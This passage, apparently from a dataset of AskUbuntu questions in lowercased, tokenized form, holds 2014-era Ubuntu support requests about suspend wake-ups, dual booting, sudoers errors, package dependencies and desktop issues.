minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/luxsrv -- vg-boot does n't contain a valid partition table disk /dev/mapper/luxsrv -- vg-swap : 4093 mb , 4093640704 bytes 255 heads , 63 sectors/track , 497 cylinders , total 7995392 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/luxsrv -- vg-swap does n't contain a valid partition table disk /dev/mapper/luxsrv -- vg-root : 167.1 gb , 167054934016 bytes 255 heads , 63 sectors/track , 20309 cylinders , total 326279168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/luxsrv -- vg-root does n't contain a valid partition table
502380	illustrator cc file in ubuntu ?	is there any way to open adobe illustrator cc files in ubuntu ? i have tried with inkskep and it does not work for adobe cc ai files . what can be done ? is there any online converter for free ?
502381	lenovo x1 carbon with ubuntu 14.04 wakes from suspend by itself after 3 hours	my machine seems to wake up from suspend by itself , at irregular intervals . causing the power to die out , and machine turn off . it is quite the annoyance , when the machine is in my case and it wakes up . and quite unhealthy as well , i would persume . it also wakes in the middle of the night , which is why i have to remember to hook on the power supply , or else i have a flat battery in the morning . the machine is a lenovo x1 carbon with ubuntu 14.04 . i use it with a onelink dock at work , but just with the power supply and a displayport monitor at home . now here is what i have done so far . i have had it suspended , and after about 3 hours , it woke up , as the logs below testify to : from pm_suspend : running hook /etc/pm/sleep.d/novatel_3g_suspend suspend suspend : /etc/pm/sleep.d/novatel_3g_suspend suspend suspend : success . thu jul 24 17:18:26 cest 2014 : performing suspend thu jul 24 20:17:04 cest 2014 : awake . thu jul 24 20:17:04 cest 2014 : running hooks for resume running hook /etc/pm/sleep.d/novatel_3g_suspend resume suspend : /etc/pm/sleep.d/novatel_3g_suspend resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/99video resume suspend : /usr/lib/pm-utils/sleep.d/99video resume suspend : success . from syslog : $ grep -b 5 `` 20:17:0 '' /var/log/syslog.1 jul 24 17:18:25 lobners-biq dbus [ 548 ] : [ system ] successfully activated service 'org.freedesktop.nm_dispatcher' jul 24 17:18:25 lobners-biq dbus [ 548 ] : [ system ] activating service name='org.freedesktop.systemd1 ' ( using servicehelper ) jul 24 17:18:25 lobners-biq dbus [ 548 ] : [ system ] successfully activated service 'org.freedesktop.systemd1' jul 24 17:18:25 lobners-biq anacron [ 11164 ] : anacron 2.3 started on 2014-07-24 jul 24 17:18:25 lobners-biq anacron [ 11164 ] : normal exit ( 0 jobs run ) jul 24 20:17:04 lobners-biq kernel : [ 7351.710460 ] pm : syncing filesystems ... done . jul 24 20:17:04 lobners-biq kernel : [ 7351.720943 ] pm : preparing system for mem sleep jul 24 20:17:04 lobners-biq kernel : [ 7351.721161 ] freezing user space processes ... ( elapsed 0.002 seconds ) done . jul 24 20:17:04 lobners-biq kernel : [ 7351.723370 ] freezing remaining freezable tasks ... ( elapsed 0.047 seconds ) done . jul 24 20:17:04 lobners-biq kernel : [ 7351.770482 ] pm : entering mem sleep jul 24 20:17:04 lobners-biq kernel : [ 7351.770544 ] suspending console ( s ) ( use no_console_suspend to debug ) jul 24 20:17:04 lobners-biq kernel : [ 7351.897854 ] sd 0:0:0:0 : [ sda ] synchronizing scsi cache jul 24 20:17:04 lobners-biq kernel : [ 7351.901194 ] sd 0:0:0:0 : [ sda ] stopping disk jul 24 20:17:04 lobners-biq kernel : [ 7352.149522 ] pm : suspend of devices complete after 378.694 msecs jul 24 20:17:04 lobners-biq kernel : [ 7352.165538 ] pm : late suspend of devices complete after 16.005 msecs jul 24 20:17:04 lobners-biq kernel : [ 7352.181723 ] ehci-pci 0000:00:1d.0 : system wakeup enabled by acpi jul 24 20:17:04 lobners-biq kernel : [ 7352.197584 ] e1000e 0000:00:19.0 : system wakeup enabled by acpi jul 24 20:17:04 lobners-biq kernel : [ 7352.229549 ] xhci_hcd 0000:00:14.0 : system wakeup enabled by acpi jul 24 20:17:04 lobners-biq kernel : [ 7352.245757 ] pm : noirq suspend of devices complete after 80.176 msecs jul 24 20:17:04 lobners-biq kernel : [ 7352.246048 ] acpi : preparing to enter system sleep state s3 jul 24 20:17:04 lobners-biq kernel : [ 7352.247624 ] pm : saving platform nvs memory jul 24 20:17:04 lobners-biq kernel : [ 7352.248416 ] disabling non-boot cpus ... jul 24 20:17:04 lobners-biq kernel : [ 7352.249937 ] smpboot : cpu 1 is now offline jul 24 20:17:04 lobners-biq kernel : [ 7352.353589 ] smpboot : cpu 2 is now offline jul 24 20:17:04 lobners-biq kernel : [ 7352.457641 ] smpboot : cpu 3 is now offline ( clipped ) i know that i can disable which hardware is allowed to wake it , but i do not know which hardware is the culprit . i disabled the lid ( using acpitool -w 1 ) , but it still woke up . $ acpitool -w device s-state status sysfs node -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - 1 . lid s4 *disabled 2 . slpb s3 *enabled 3 . igbe s4 *disabled pci:0000:00:19.0 4 . exp2 s4 *disabled pci:0000:00:1c.1 5 . xhci s3 *enabled pci:0000:00:14.0 6 . ehc1 s3 *enabled pci:0000:00:1d.0 i then disabled the two usb ones ( 5 & 6 ) but still it wakes up . $ acpitool -w device s-state status sysfs node -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - 1 . lid s4 *disabled 2 . slpb s3 *enabled 3 . igbe s4 *disabled pci:0000:00:19.0 4 . exp2 s4 *disabled pci:0000:00:1c.1 5 . xhci s3 *disabled pci:0000:00:14.0 6 . ehc1 s3 *disabled pci:0000:00:1d.0 again : from pm_suspend : running hook /etc/pm/sleep.d/novatel_3g_suspend suspend suspend : /etc/pm/sleep.d/novatel_3g_suspend suspend suspend : success . thu jul 24 23:11:59 cest 2014 : performing suspend fri jul 25 01:58:01 cest 2014 : awake . fri jul 25 01:58:01 cest 2014 : running hooks for resume running hook /etc/pm/sleep.d/novatel_3g_suspend resume suspend : /etc/pm/sleep.d/novatel_3g_suspend resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/99video resume suspend : /usr/lib/pm-utils/sleep.d/99video resume suspend : success . from syslog : $ grep -b 5 `` 01:58 : '' /var/log/syslog.1 jul 24 23:11:58 lobners-biq dbus [ 548 ] : [ system ] successfully activated service 'org.freedesktop.nm_dispatcher' jul 24 23:11:58 lobners-biq dbus [ 548 ] : [ system ] activating service name='org.freedesktop.systemd1 ' ( using servicehelper ) jul 24 23:11:58 lobners-biq dbus [ 548 ] : [ system ] successfully activated service 'org.freedesktop.systemd1' jul 24 23:11:58 lobners-biq anacron [ 16204 ] : anacron 2.3 started on 2014-07-24 jul 24 23:11:58 lobners-biq anacron [ 16204 ] : normal exit ( 0 jobs run ) jul 25 01:58:01 lobners-biq kernel : [ 17846.114837 ] pm : syncing filesystems ... done . jul 25 01:58:01 lobners-biq kernel : [ 17846.147640 ] pm : preparing system for mem sleep jul 25 01:58:01 lobners-biq kernel : [ 17846.147832 ] freezing user space processes ... ( elapsed 0.002 seconds ) done . jul 25 01:58:01 lobners-biq kernel : [ 17846.149916 ] freezing remaining freezable tasks ... ( elapsed 0.090 seconds ) done . jul 25 01:58:01 lobners-biq kernel : [ 17846.240249 ] pm : entering mem sleep jul 25 01:58:01 lobners-biq kernel : [ 17846.240309 ] suspending console ( s ) ( use no_console_suspend to debug ) jul 25 01:58:01 lobners-biq kernel : [ 17846.370439 ] sd 0:0:0:0 : [ sda ] synchronizing scsi cache jul 25 01:58:01 lobners-biq kernel : [ 17846.373919 ] sd 0:0:0:0 : [ sda ] stopping disk jul 25 01:58:01 lobners-biq kernel : [ 17846.618053 ] pm : suspend of devices complete after 377.454 msecs jul 25 01:58:01 lobners-biq kernel : [ 17846.634086 ] pm : late suspend of devices complete after 16.022 msecs jul 25 01:58:01 lobners-biq kernel : [ 17846.666119 ] e1000e 0000:00:19.0 : system wakeup enabled by acpi jul 25 01:58:01 lobners-biq kernel : [ 17846.714324 ] pm : noirq suspend of devices complete after 80.194 msecs jul 25 01:58:01 lobners-biq kernel : [ 17846.714615 ] acpi : preparing to enter system sleep state s3 jul 25 01:58:01 lobners-biq kernel : [ 17846.716223 ] pm : saving platform nvs memory jul 25 01:58:01 lobners-biq kernel : [ 17846.717020 ] disabling non-boot cpus ... jul 25 01:58:01 lobners-biq kernel : [ 17846.718527 ] smpboot : cpu 1 is now offline jul 25 01:58:01 lobners-biq kernel : [ 17846.822120 ] smpboot : cpu 2 is now offline jul 25 01:58:01 lobners-biq kernel : [ 17846.822517 ] broke affinity for irq 23 jul 25 01:58:01 lobners-biq kernel : [ 17846.822519 ] broke affinity for irq 57 jul 25 01:58:01 lobners-biq kernel : [ 17846.926171 ] smpboot : cpu 3 is now offline jul 25 01:58:01 lobners-biq kernel : [ 17846.927621 ] acpi : low-level resume complete jul 25 01:58:01 lobners-biq kernel : [ 17846.927675 ] pm : restoring platform nvs memory jul 25 01:58:01 lobners-biq kernel : [ 17846.928186 ] enabling non-boot cpus ... jul 25 01:58:01 lobners-biq kernel : [ 17846.928215 ] x86 : booting smp configuration : jul 25 01:58:01 lobners-biq kernel : [ 17846.928216 ] smpboot : booting node 0 processor 1 apic 0x1 jul 25 01:58:01 lobners-biq kernel : [ 17846.942510 ] cpu1 is up jul 25 01:58:01 lobners-biq kernel : [ 17846.942524 ] smpboot : booting node 0 processor 2 apic 0x2 jul 25 01:58:01 lobners-biq kernel : [ 17846.956793 ] cpu2 is up jul 25 01:58:01 lobners-biq kernel : [ 17846.956806 ] smpboot : booting node 0 processor 3 apic 0x3 jul 25 01:58:01 lobners-biq kernel : [ 17846.971073 ] cpu3 is up jul 25 01:58:01 lobners-biq kernel : [ 17846.974855 ] acpi : waking up from system sleep state s3 ( clipped ) while the pm_suspend logs are similar , there is some discrepancy in the syslog files . i do n't know what to make of that ? does anybody have an idea as to what this might be ? ? note : the similar question `` ubuntu 12.04 - wakes from suspend by itself '' is not a duplicate . it does not seem that the scripts in the answer has any effect , and my problem is also not with it failing to suspend or wake . it fails to stay in suspend . which is also what the question sort of is about , but the wake-on-lan option in ethtool is also 'd ' in my case .
502382	customize the startup application	i want to make my application as the startup application , means my.py should be come first after the ubuntu desktop came ( x app start ) . how to do . regards , malatesh ankaspur
502384	windows 8 and ubuntu dual boot issues	i know tons of people have issues dual booting linux with windows 8 machines because of all the uefi garbage . in fact , i had a similar issue last year . after installing windows 8 next to ubuntu , i can only boot 8 that link says how i fixed my issue then . here 's my problem now . i messed up my os and decided to load everything again from scratch . i re-installed windows 8 and then grabbed a copy of ubuntu 14.04 ( previously i was using 12.04 ) . i 'm having the same issue where windows 8 is forcing itself to boot but what solved my issue before no longer works . from a live cd i ran these commands : sudo add-apt-repository ppa : yannubuntu/boot-repair & & sudo apt-get update sudo apt-get install -y boot-repair & & ( boot-repair & ) i get all sorts of errors about boot-repair not being a valid command . i was finally able to run boot-repair using this : sudo add-apt-repository -y ppa : yannubuntu/boot-repair sudo sed 's/trusty/saucy/g ' -i /etc/apt/sources.list.d/yannubuntu-boot-repair-trusty.list sudo apt-get update sudo apt-get install -y boot-repair & & boot-repair i get a warning about uefi being turned on ( after i 've done everything i know how to make sure it 's disabled ) and then the boot repair errors out . here 's the message it generates : http : //paste.ubuntu.com/7852448/ i noticed i can boot to ubuntu if i stop the normal boot process and select ubuntu from the boot menu but that 's the best i have . i also tried running this command from windows : bcdedit /set { bootmgr } path \efi\ubuntu\grubx64.efi i 'm dying here . any help you guys can provide would be superb . thanks !
502386	restricting pptpd to certain websites	i 've got basic vpn running on ubuntu 14.04 ( pptpd ) . i would like to restrict access when using this vpn to specific websites ( meaning all other websites or ip 's that are n't specifically mentioned can not be accessed ) . i 've tried using iptables to do this but was unable to achieve a solution . what 's the best way to go about this , is it possible ? thanks .
502388	problem unistalling ubuntu 13.10 from bootloader ( windows 8 )	i installed ubuntu 13.10 on my usb . then i formatted the usb with ubuntu 13.10 , but now how to remove the ubuntu from boot loader on windows 8 . i was trying to install ubuntu 14.10 on my hard disk but it says `` a previous installation of ubuntu was found on c : / '' although i had formatted the usb and there is no ubuntu folder in c drive . how to remove it from boot loader because i think it would be causing problem ?
502396	problem in apache error log ?	i 'm new to php and ubuntu , first of all , i 'll install the wine windows program loader and download the macro-media dreamwear . before a day it working fine but yesterday it had some problem . i 'll create the program of phptest.php and run the application http : //localhost/test/phptest.php in firefox its running fine in my view . some times it had an error means i 'll check the error.log and correct it . ( location : /var/log/apache2/error.log ) but yesterday the error.log is continuously running . its says same error . [ thu jul 24 16:13:49.856537 2014 ] [ : error ] [ pid 1843 ] [ client 127.0.0.1:44200 ] php notice : undefined offset : 9443 in /var/www/html/test/phptest.php on line 118 i 'll check to close all the programs like macro-media dreamwear and firefox . but its still running same error is running . after i 'll check all kind of place in running path in this place automatically creating some folder and inside the file is looking like as same the folder is _notes and file is phptest.php.mno file location ( /var/www/html/test/_notes/phptest.php.mno ) . i 'll completely remove the folder and file but still error.log file is throwing in same error .
502398	i modified sudoers . all users can not use sudo now . how should i fix this ?	i was trying to save times to type password for sudo because one of my scripts had to be randomly repeated quite often . i googled some information about how to bypass typing password and applied to my server . now the sudo account is corrupted and all the users on server cant not use sudo . how can i fix this ? what i did : i created mysudoers in /etc/sudoers.d/ sudo vim /etc/sudoers.d/mysudoers added my account in mysudoers rna all = nopasswd : ~/scripts/getlog save & exit chmod sudo chmod 0440 /etc/sudoers.d/mysudoers error log when i type sudo : rna @ rna-p580 : /etc/sudoers.d $ sudo sudo : > > > /etc/sudoers.d/mysudoers : syntax error near line 0 < < < sudo : parse error in /etc/sudoers.d/mysudoers near line 0 sudo : no valid sudoers sources found , quitting sudo : unable to initialize policy plugin
502401	is there a `` top-level ' package for ubuntu 14.04 ?	with a really dumb move , i removed the pulseaudio package on my machine and reinstalled it . the resulting desktop is broken ( all the packages that are dependent on pulseaudio have not been reinstalled ) i.e . i have no sound : - ) is there a package whose dependencies can restore a working system ? i was thinking of maybe the desktop ( unity ) , or in a ideal world a meta package for the whole distro . or am i looking at a complete reinstall from a live-cd ?
502403	how do i 'dd ' backup my surface ?	i like using dd imaging for all my new devices . how do i dd backup my surface ? on my laptops all i did was : f12 > ubuntu live on a usb memstick > sudo -i ; sudo dd=if=/dev/sda bs=9999k of=/mnt/homeserver/backupfileofmycomputer.backup
502406	mounting on startup after all services got loaded	i 'm running ubuntu 14.04 under vmware workstation . i 'm sharing some folders between windows and ubuntu . shared folders are mounted into through /etc/fstab : .host : / /home/www vmhgfs defaults 0 0 when i restart ubuntu i see that error on startup : an error occured while mounting /home/www keys : press s to skip mounting or m for manual recovery so the system starts without mounted folder . but manual `` mount -a '' works and the folders get mounted correctly . looks like during startup vmhgfs is not yet initialized when fstab is getting mounted . maybe here is a way to say fstab to init after all other services ? or maybe i look in a wrong way .
502407	displaying command line boot in ubuntu after using janitor	after using the janitor to clean the old kernels in my pc , it shows me the command line interface to login . problem is as my pc was set to automatic login i do n't remember the login username , but have my password . i have tried every possible usernames using my name combination but everything failed . can someone please guess the username from the following screen shot more problem is that after restarting again to shows me different error , here is a screen shot of the error . i really do n't want to format . please suggest
502408	album thumbnails of mp3 files not showing	i 'm using ubuntu 13.10 and have used easytag to add id3 tags ( image metadata ) to many of my music files , changing the old ones . some album arts are showing up , but many are n't . this problem happens with .ogg too , but i 'm using .mp3 files . solution1 : nautilus needs a restart , or i need to delete the albumthumbs directory that seems to be a forceful task . when i open the song ( through , say , rhythmbox ) , the album art is shown properly , for all files . so i was thinking whether a simple cold boot would do or not . i mean the album arts are there fine , just that the file system ai n't showing them . solution2 : some files do n't have album arts as i said , i have manually added the image files , or rather replaced the older ones . they 're not showing the older thumbnails either the icons are merely showing the default gnome `` music '' icon , not the older album arts they had . ( melody sign on a file logo . ) potential solution : renaming file thumbnails folder ? i heard i should rename the folder that stores file thumbnails ( home/.cache/thumbnails/normal ) . would it be okay or can it be harmful ? question : what do i do so that the correct album thumbnails show up ?
502409	recognize windows 8.1	the new ubuntu 14 point something does n't recognize windows 8.1 in the installation process . i would like to install it side-by-side , but since the backdoor way includes creating my own partitions on the drive and a bunch of stuff i am not familiar with nor comfortable doing , i will not be installing it . is there any fix for this that is coming out ? thank you for your time and i hope you have a great day !
502410	how to fix my keyboad	i was working with my laptop suddenly the some problems happen for my keyboard . the j switch to 1 k switch to 2 l switch to 3 u switch to 4 i switch to 5 and ... how can i fix this ? and if you , know what do you guess about the reason of this problem ? ps : i have two keyboard and i am using that one which exclude from the keyboard .
502413	archive repository for ubuntu 12.10	ubuntu 12.10 is not supported any more since may 2014 . why is there no archived version at http : //old-releases.ubuntu.com/ ?
502416	error : hd0 out of disk ?	i 'm running ubuntu 12.04 lts on a samsung chronos 7 laptop . the computer was running fine , until recently after a required reboot , the screen was black showing : '' error : hd0 out of disk grub rescue > '' i have absolutely no idea what 's going on here at all . i 've read that it has to do with conflicting partitions , but i 'm 99 % sure that i deleted the entire hard drive of any existing partition when first installing ubuntu . does anybody have a clue ?
502418	failed to upgrade new hardware support for ubuntu 12.04 - unmet dependencies libgl1-mesa-glx-lts-trusty etc	ubuntu update manager offers me new hardware support . when i try to upgrade i get the following error message . the following packages have unmet dependencies : libgl1-mesa-glx-lts-trusty : depends : libglapi-mesa-lts-trusty ( = 10.1.3-0ubuntu0.1~precise1 ) but 10.1.3-0ubuntu0.1~precise1 is to be installed depends : libx11-6 ( > = 2:1.4.99.1 ) but 2:1.4.99.1-0ubuntu2.2 is to be installed depends : libxdamage1 ( > = 1:1.1 ) but 1:1.1.3-2build1 is to be installed libglu1-mesa-dev : depends : libglu1-mesa ( = 8.0.4-0ubuntu0.7 ) but 8.0.4-0ubuntu0.7 is to be installed libqt4-opengl-dev : depends : libqt4-dev ( = 4:4.8.1-0ubuntu4.8 ) but 4:4.8.1-0ubuntu4.8 is to be installed depends : libqt4-opengl ( = 4:4.8.1-0ubuntu4.8 ) but 4:4.8.1-0ubuntu4.8 is to be installed libvtk5-dev : depends : libvtk5.8 ( = 5.8.0-5 ) but 5.8.0-5 is to be installed depends : libexpat-dev but it is a virtual package depends : libpng-dev but it is a virtual package depends : libtiff-dev but it is a virtual package xserver-xorg-core-lts-saucy : depends : xserver-common-lts-saucy ( > = 2:1.14.6-0ubuntu1~precise2 ) but 2:1.14.6-0ubuntu1~precise2 is to be installed xserver-xorg-lts-trusty : depends : xserver-xorg-core-lts-trusty ( > = 2:1.11 ) but 2:1.15.1-0ubuntu2~precise1 is to be installed does anybody has an idea how to resolve this issue ?
502423	list of installed packages on ubuntu server 14.04	i need to know , what are installed packages for ubuntu server for the first time ? i need the output of dpkg -l of freshly installed 32-bit ubuntu-server ( just openssh server , without mail , file , web server packages ) i need the list of installed packages so i could uninstall/clean up packages that not installed by default on my computer ( without reinstalling the ubuntu ) that was installed by my friend .
502426	adding a simpel `` save '' button to the shotwell image viewer ?	can someone tell me if i can add a simpel save button to the shotwell image editor ? its more than pointless to have it on the viewer , but not on the editor ? i know strg+s or simpy close and click save would work , but i really want add this button
502430	how to add one column to the another file	suppose this is my file which its name is myfile1 1 10 2 20 3 30 4 40 5 50 6 60 know i want to add my another columns to this . this column is on the file which is myfile2 . 10 11 12 13 14 15 16 . is there any way to add myfile2 to myfile1 to create this table : 1 10 10 2 20 11 3 30 12 4 40 13 5 50 14 6 60 15
502431	security updates for old-releases	i know that i should upgrade to a newer supported ubuntu version if possible , but : if you have no possibility to upgrade ( for reasons not important here ) you have to use the old-releases archive from http : //old-releases.ubuntu.com to still be able to install some software . are those archives not touched at all ? or does ubuntu sometimes still update them to solve fatal security issues with critical vulnerabilities like the `` heartbleed bug '' in the old releases ? or is there an alternative repository , i could use in my sources.list on such an old system ? or is there some list of fixes/backports , i could/should install on those old systems ?
502433	problem with dialog windows and different workspaces	i have 9 workspaces . usually google chrome is on 1-st workspace . but sometimes open new window of google chrome on some other workspace , let say 3-rd . then i click something that will open new dialog window ( in google chrome ) , while working on 3-rd workspace , this new dialog windows will appear on 1-st workspace . and i do n't know about it . i keep clicking a few times and then i realize that all new windows are opened in 1-st workspace . i can easy reproduce this doing this steps : open google chrome press ctrl + n , to open new window move this 2-nd windows to another workspace open gmail.com in this 2-nd window , and compose new email . press attach new attach dialog will open in 1-st workspace , while i 'm waiting it in 2-nd . same behavior for askubuntu image uploader window . is this bug of ubuntu or google chrome ? i want to report a bug , but do n't know who is bugging $ google-chrome -- version google chrome 36.0.1985.125 $ uname -srv linux 3.13.0-32-generic # 57-ubuntu smp tue jul 15 03:51:08 utc 2014 $ cat /etc/lsb-release distrib_id=ubuntu distrib_release=14.04 distrib_codename=trusty distrib_description= '' ubuntu 14.04.1 lts ''
502436	upgrade very old eol version of ubuntu to recent one without fresh install	anyone has tried to upgrade all the way from ubuntu feisty 7.04 to trusty 14.04 ? ( i know the best way would be to get my data off the server and fresh install the latest release , but this is not the question here ) my guess would be to use the old-releases to upgrade step by step from 7.04 to 7.10 7.10 to 8.04.3 lts 8.04.3 to 10.04 10.04 to 12.04 12.04 to 14.04 i read this wiki manual for upgrading old releases but it does n't say anything about directly upgrading from for example 7.04 to 14.04 . but it seems like there a faster way to achieve this than updating step by step , is there ? ( see : can i skip over releases when upgrading ? ) what kind of problems would occur , if i go through all those steps especially from 7.04 to 14.04 ? ( sure i am sure , that there could emerge unsolvable problems so the system will end up in an unrecoverable state , so this would be just a try if it works )
502443	enable wifi not showing	good day , i have been using ubuntu for four months now with my wifi and ethernet working well . but now it is no longer showing the enable wifi option on the network menu and i cant turn it on using the wifi button on the keyboard . what do i do . i am using ubuntu 14.04 .
502445	saving output of a grep into a file with colors	i need to save the result of a grep command into a file , but i also want the output file to be formatted and keep the colors just like in the terminal . is there a way to do that ? maybe make grep save to a some kind of markup language ? if it is not possible , is there another tool that can accomplish this task ? i am trying to make the search keyword stand out in the output file , exactly like it does in the terminal .
502447	missing partitions macbook ( 2006 )	my friend came over recently , with a corrupted macbook ( 2006 ) . he does n't have the snow leopard dvd . i 've live booted ubuntu 8.04 ( none newer than that worked ) and seems to be working ok . the only problem is , there are no partitions to install onto . i think this is because macs use hfs+ and ubuntu can not detect it ( ? ) so , i would need to know how to ( mount ? ) this hard drive correctly from within ubuntu . i have no access to osx , only the `` ? folder of death '' can anyone help with this ? [ edit ] i also have a windows 7 install disk , but that has the same problem of not being able to install , due to the lack of any form of partitioning .
502449	remove text that i do n't want	i have a big html file on my desktop that looks like src= '' http : //images.alaablubnan.com/images/balls/20.jpg '' alt= '' http : //images.alaablubnan.com/images/balls/20.jpg '' / > < /a > < /td > < td > < a href= '' http : //images.alaablubnan.com/images/balls/32.jpg '' target= '' _blank '' > < img src= '' http : //images.alaablubnan.com/images/balls/32.jpg '' alt= '' http : //images.alaablubnan.com/images/balls/32.jpg '' / > < /a > < /td > < td > < a href= '' http : //images.alaablubnan.com/images/balls/30.jpg '' target= '' _blank '' > < img src= '' http : //images.alaablubnan.com/images/balls/30.jpg '' alt= '' http : //images.alaablubnan.com/images/balls/30.jpg '' / > < /a > < /td > < /tr > < tr > < td > < table > < tr > < td > webpage/url < /td > < td > http : //www.playlebanon.com/webservices/website/lotto/popups/historydetail.aspx ? t=1405536730503 & fromdraw=1 & todraw=1213 & draw=0 < /td > < /tr > < /table > < /td > < td > 2 < /td > < td > complete lotto results < /td > < td > complete lotto results < /td > < td > 2 < /td > < td > < a href= '' http : //www.playlebanon.com/webservices/website/lotto/popups/historydetail . if possible , i want to : get all the .jpg files , remove all the html code ( it 's 1.jpg , 2.jpg ... to 42.jpg ) i want to remove the .jpg extenstion i want each row of numbers to have 7 numbers only , then insert new line
502452	how can i shrink a volume	in my desktop all hard disk is taken as ubuntu partition . i , want to shrink this by at least 50 gb to make another partition , to keep my personal data . this is an image of my partitions how can i shrink this partition and create a new one ?
502454	firefox problem with dark themes : auto-complete items are illegible	it seems something changed in firefox since the version 30 which makes auto-complete items illegible on dark themes with dark menus . there 's no difference whether on ambiance or numix , for example . the reason changing parameters in gtkrc file , i 've found out changing text [ normal ] on color definitions to something lighter can solve the problem . for example changing it to `` # dfdbd2 '' ( the same as @ fg_color_dark ) we have : but as you know , it does n't make any sense since we will have light texts everywhere on a light background . so my question is : what should i do ? should i report a bug on firefox ? or are there any workarounds to solve this ? what did n't have any effects : i 've tried the following on gtkrc without any changes to the problem : text [ normal ] = `` # dfdbd2 '' under either style `` menu '' and style `` menuitem '' ; widget_class `` * < gtkmenu > * '' style `` menuitem_text_is_fg_color_workaround '' ; widget_class `` * < gtkmenuitem > * '' style `` menuitem_text_is_fg_color_workaround '' ; disabling other widget_class 's already defined as `` fg_is_text_color '' since i did n't know what they are â just to try . p.s . : i know removing `` dark '' from style `` menu '' will light the background and apparently solve the problem ; but consistency is a matter of concern â i want dark menus everywhere .
502458	dell synaptics touchpad issues	running ubuntu 12.04 on a fresh install but nothing i 've found seems to work . what has got me even more stumped is this : user @ abcd : ~ $ xinput ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ logitech usb receiver id=11 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ video bus id=8 [ slave keyboard ( 3 ) ] ↳ power button id=9 [ slave keyboard ( 3 ) ] ↳ sleep button id=10 [ slave keyboard ( 3 ) ] ↳ integrated_webcam_hd id=13 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=14 [ slave keyboard ( 3 ) ] ↳ dell wmi hotkeys id=15 [ slave keyboard ( 3 ) ] ↳ logitech usb receiver i 've gone to the dell site and tried to install their drivers , no luck . checked the ubuntu sc , installed , no luck . researched on here , no luck . please someone have a solution ! !
502461	where do i find net tools documentation ( or ) user manual ?	i am trying to find user manual of net tools on ubuntu , i tried it on google , but i could n't found any manual for net tools , i got to hear that it is alternative for fiddler , i 've installed nettool-4.7.2 thank u in advance
502464	ms sql/spagobi/tomcat/ubuntu	i am new to ubuntu , and have some questions . i am trying to connect an ubuntu server to ms sql so that spagobi can get information from the ms sql server . now i have followed a couple of forums and tips , but i 'm just a total idiot when it comes to ubuntu and configuring programs in ubuntu . i need someone who can assist me step by step on what to do , i have already installed odbc , java drivers etc . but am stuck on how to actually get the two servers to communicate , and how to get spagobi on tomcat to see information in ms sql .
502466	check dialog input fields	i try to add to below script a control that when i press `` enter '' key . i 'd like being imposed to compile all 4 fields to continue with the script : # ! /bin/bash shell= '' '' groups= '' '' user= '' '' home= '' '' exec 3 > & 1 dialog -- separate-widget $ '\n ' -- ok-label `` ok '' \ -- backtitle `` linux user managment '' \ -- title `` new '' \ -- form `` creating new `` \ 15 80 0 \ `` field1 : `` 1 1 `` $ user '' 1 25 40 0 \ `` field2 : '' 2 1 `` $ shell '' 2 25 40 0 \ `` field3 : '' 3 1 `` $ groups '' 3 25 40 0 \ `` field4 : '' 4 1 `` $ home '' 4 25 40 0 \ # aggiungi dimensione quota 2 > & 1 1 > & 3 | { read -r user read -r shell read -r groups read -r home echo $ user echo $ shell echo $ groups echo $ home # continue script here } exec 3 > & - indeed now , i can fill first field and i can press enter key and the script continues with its work .
502470	how to restart networking with www-data	i have a website which is changing configuration file in /etc/network/interfaces but www-data can not restart networking . how do that ? ubuntu server 12.04
502471	select mirror during installation from live mode	without customising the ubuntu live image , is it possible to select a mirror during installation ? if not , what are the options available ? i can think of customising the image , or somehow using preseeding with ubiquity . the annoying thing is that i am booting live ubuntu over the network ( via pxe booting ) , so the network connectivity is assumed . this causes ubiquity to try to fetch some things from the mirror , even though , by its admission , it does n't have `` internet connectivity '' , since we are behind a campus proxy . because of this , it spends a lot of time trying to fetch something and we have to manually skip that part . we do have a ( official ) mirror within campus , so we would like to use that . i 'd like a way that does n't involve customising the live environment , so that i can suggest that as a way for students who use their own usb drives . ( here is , for example , a question about another problem from live booting over the network that i am facing : ubuntu live over pxe boot sets manual config for networking ) here are a couple of screenshots from a test on a vm : here are a couple of screenshots from a test on a laptop : note the usage of in.archive.ubuntu.com , even though , following @ noleti 's advice , i had set ftp.iitb.ac.in as the mirror :
502472	ca n't upgrade within ubuntu or from boot	i 'm a linux beginner . i 've used ubuntu for a year but only for the every day stuff . i tried to reinstall windows 7 on many occasions but it kept coming up with errors . i had tried lots of different things and was getting fed up , so i thought i would switch my 79 year old grandma to ubuntu . also had problems , it looked like grub ubuntu start screen when cd/dvd boot , tryed live cd , install , memtest is all that has showed . anytime i clicked install it would pretty much take me to live cd with an error . i spent all night making new dvds of different linuxs trying each and everyone , turning legacy boots on and off , secure boot enable/disable , replacing ram , even though test came back fine . i took out my hdd and placed it in to my grandmas laptop , it worked showing all of her laptop specs . i then took my grandma hdd out of her laptop and placed it into my laptop and install ubuntu 12.04 like that swapped them back over and it was working , but with many problems . ubuntu software centre is n't opening , well something is opening and closing with a blink of the eye . additional drivers , is n't opening sudo apt-get install < anything > returns errors i have tried to update/upgrade from boot cd/dvd but no luck .
502475	windows softwares in 14.04 ?	does 14.04 support all the softwares which work in window 8.1 like photoshop , corel draw , and all games like nfs , xmen , pes ? i do n't need any antivirus for this 0s , right ? pls reply
502476	screen locks after a few seconds	ubuntu 14.04 locks my screen after a few second . i do n't always have to log in after this happens . most of the time i do . it 's about every 20-30 seconds that i have to do this . i have tried to change the settings and turn of screen lock but nothing seems to work . i 'm thinking of going to windows 8 because this should be a simple fix ?
